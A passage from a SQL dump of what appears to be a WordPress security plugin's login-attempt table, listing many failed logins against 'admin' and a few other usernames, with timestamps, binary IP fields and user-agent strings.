WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4694,7833,1629292617.806726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4695,7834,1629293035.539856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4696,7835,1629293447.969987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4697,7836,1629293842.691004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4698,7837,1629294118.593624,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.5','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0'),(4699,7838,1629294248.580897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4700,7839,1629294638.459955,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4701,7840,1629295010.001750,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4702,7842,1629295822.754613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1T&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4703,7843,1629296201.369145,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4704,7844,1629296583.330657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4705,7845,1629296998.286035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4706,7845,1629296998.294382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4707,7846,1629297383.242381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4708,7847,1629297771.004782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4709,7848,1629298164.818767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rL��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4710,7849,1629298559.222004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4711,7850,1629298735.730689,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4712,7851,1629298945.149681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4713,7852,1629299122.505642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r:=G','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(4714,7855,1629300068.085594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4715,7856,1629300514.810348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4716,7857,1629300731.790359,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���)z�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4717,7858,1629300904.986399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4718,7859,1629300913.582569,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(4719,7860,1629301293.414642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4720,7861,1629301703.068813,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4721,7862,1629302087.089887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ge�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4722,7864,1629302487.130467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4723,7866,1629303035.843169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4724,7867,1629303262.634299,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4725,7868,1629303650.296653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4726,7869,1629303793.988927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(4727,7870,1629304098.095305,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4728,7871,1629304455.570969,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4729,7872,1629304557.625915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4730,7873,1629304799.521243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ʈ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4731,7874,1629305252.250081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4732,7875,1629305601.342766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4733,7876,1629306093.894944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(4734,7877,1629306866.654935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4735,7878,1629307619.950597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4736,7878,1629307620.033777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4737,7884,1629313721.909659,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4738,7887,1629314503.660649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4739,7889,1629316039.017378,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4740,7890,1629316619.863296,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4741,7891,1629316623.871509,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4742,7892,1629316632.236666,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4743,7893,1629316636.116453,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4744,7894,1629316640.338522,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4745,7895,1629316644.763084,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4746,7896,1629316648.715703,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4747,7897,1629316652.592166,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4748,7898,1629316656.501002,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4749,7899,1629316660.436777,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4750,7900,1629316663.619258,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4751,7901,1629316664.624203,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4752,7902,1629316668.388883,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4753,7902,1629316668.430136,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4754,7903,1629316670.502872,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4755,7903,1629316670.540207,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4756,7904,1629316670.841040,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4757,7905,1629316672.664709,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4758,7905,1629316672.706530,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0����1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4759,7913,1629319890.739443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4760,7915,1629321440.277596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4761,7916,1629322222.768997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4762,7925,1629328323.626364,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4763,7926,1629329104.479392,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4764,7935,1629339581.542604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4765,7936,1629339930.798485,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(4766,7936,1629339939.034258,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(4767,7939,1629342052.902326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4768,7946,1629346701.562683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4769,7947,1629346951.024275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4770,7948,1629346951.306434,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4771,7949,1629346951.560613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4772,7950,1629346951.825667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4773,7951,1629346952.066885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4774,7952,1629346952.300937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4775,7953,1629346952.509778,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4776,7954,1629346953.028790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4777,7955,1629346953.327496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4778,7956,1629346953.669273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4779,7957,1629346953.931490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4780,7958,1629346954.193047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4781,7959,1629346954.404999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4782,7960,1629346954.726098,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4783,7961,1629346955.625368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4784,7962,1629346956.608439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4785,7963,1629346957.206369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4786,7964,1629346957.532764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4787,7965,1629346958.052051,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4788,7969,1629348927.108584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4789,7972,1629351102.286723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4790,7977,1629353302.946153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"B��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4791,7977,1629353302.978836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"B��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4792,7978,1629354040.941675,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4793,7979,1629354783.151278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4794,7980,1629355520.414475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4795,7984,1629358041.798501,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4796,7985,1629358262.738176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4797,7988,1629358760.996573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4798,7989,1629359026.266767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��΂k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4799,7990,1629359256.881572,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4800,7991,1629359257.793535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�A*','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4801,7992,1629359485.094617,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��U��&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4802,7993,1629359528.311264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4803,7994,1629359780.571859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4804,7995,1629360004.393334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aD�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4805,7996,1629360021.625397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4806,7997,1629360317.466897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wk��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4807,7998,1629360540.535375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4808,7999,1629360757.927167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^x�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(4809,8000,1629360816.299592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4810,8001,1629361069.685658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4811,8001,1629361069.718267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4812,8002,1629361321.116262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 